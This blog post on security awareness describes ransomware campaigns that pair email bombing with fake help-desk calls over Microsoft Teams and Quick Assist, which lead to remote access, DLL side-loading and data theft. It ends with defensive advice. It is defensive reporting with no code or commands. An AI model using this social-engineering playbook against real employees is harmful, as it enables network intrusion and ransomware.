Ransomware Tactics Evolve: Why Email Bombing and Microsoft Teams Scams Should Concern You.

Have you ever been bombarded by endless spam emails and thought, “This is just annoying”? What if I told you it’s more than just a nuisance? Ransomware gangs have upped their game, combining email bombing with sneaky tech support scams over Microsoft Teams. It’s a double whammy aimed at tricking employees into unknowingly handing over the keys to the company network.

Let’s break this down. Imagine getting thousands of spam emails in the span of an hour, leaving your inbox overwhelmed and your patience tested. Then, out of nowhere, you receive a Microsoft Teams call from someone claiming to be from IT support. Would you answer it? Would you believe them if they said they could fix your email chaos? That’s exactly the trap being set by these cybercriminals.

How Are They Doing This?

Ransomware gangs are exploiting the default configuration of Microsoft Teams, which often allows external domains to call or message employees. Once they get through, the hackers pretend to be your helpful IT team, guiding you to install remote control software under the guise of fixing the problem. But instead of help, they’re installing malware that opens the door to your company’s entire network.

This tactic first caught the attention of researchers last year, with attacks attributed to the notorious Black Basta ransomware gang. Sophos, a leading cybersecurity company, has since observed the same methods being used by other groups, potentially linked to the FIN7 gang. These aren’t amateurs; these are professionals in cybercrime, and they’re refining their strategies.

What Does This Look Like in Action?

Let me paint a picture of one such attack:

  1. Step 1: Email Bombing
    • Hackers send thousands of spam messages to an employee’s inbox—we’re talking 3,000 emails in 45 minutes. This overload is designed to create chaos and frustration.
  2. Step 2: The Fake IT Call
    • Shortly after the email storm, the employee receives a Teams call from an external account called “Help Desk Manager.” The person on the other end sounds knowledgeable, convincing, and—most importantly—helpful.
  3. Step 3: Remote Access Setup
    • The attacker convinces the victim to set up a remote control session through Teams. Once they’re in, they drop malicious files—a Java archive (MailQueue-Handler.jar) and Python scripts hosted on an external SharePoint link.
  4. Step 4: Malware Deployment
    • The malware executes PowerShell commands to download legitimate software (like ProtonVPN) and pair it with malicious DLL files. These files create encrypted communication channels with the attackers, giving them remote access to the compromised machine.

From there, it’s a playground for the hackers: they’ll check system details, drop additional malware, and even use penetration testing tools like RPivot to pivot further into the network. Sophos researchers noted that the endgame was likely to steal sensitive data before deploying ransomware.

Another Campaign, Another Tactic

A similar campaign took a slightly different approach. Here, hackers again bombarded employees with spam emails, but instead of using Teams remote control, they guided the victim to install Microsoft Quick Assist. This gave the attackers direct, hands-on access to the system, which they used to:

  • Download malware hosted on Azure Blob Storage.
  • Side-load malicious DLLs into legitimate processes like Microsoft OneDrive.
  • Steal credentials, log keystrokes, and scan the network for further targets.

The ultimate goal? Deploy Black Basta ransomware. But before doing so, the attackers combed through files with names like “passwords,” accessed Remote Desktop Protocol (RDP) files, and likely exfiltrated any valuable data they could find.

Why Does This Matter to You?

It’s easy to think, “This would never happen to us,” but these tactics exploit human trust and default configurations. How often do we accept calls or messages at face value, especially when they come from someone claiming to be IT support? And how many companies leave Microsoft Teams open to external domains, unaware of the risks?

What Can You Do to Stay Safe?

  1. Block External Domains: Adjust Microsoft Teams settings to prevent messages and calls from external domains unless absolutely necessary.
  2. Disable Quick Assist: On critical environments, disable tools like Quick Assist to limit potential avenues for attackers.
  3. Train Your Team: Educate employees about these evolving tactics. Emphasize the importance of verifying IT support requests, especially if they come via unexpected channels.
  4. Strengthen Email Filters: Implement robust email filtering to block spam and phishing campaigns before they reach your employees.
  5. Monitor for Suspicious Activity: Keep an eye on unusual file downloads, PowerShell executions, and new services being created on endpoints.

Final Thoughts

The sophistication of these ransomware gangs is a wake-up call for organizations everywhere. They’re not just targeting systems; they’re targeting people. By exploiting trust and default settings, they’re finding new ways to breach networks and cause chaos.

The question is: Are we ready to stop them? By tightening controls, educating teams, and staying vigilant, we can make their job much harder. Because at the end of the day, your network’s security starts with you.

Leave a Reply

Your email address will not be published. Required fields are marked *

Related Posts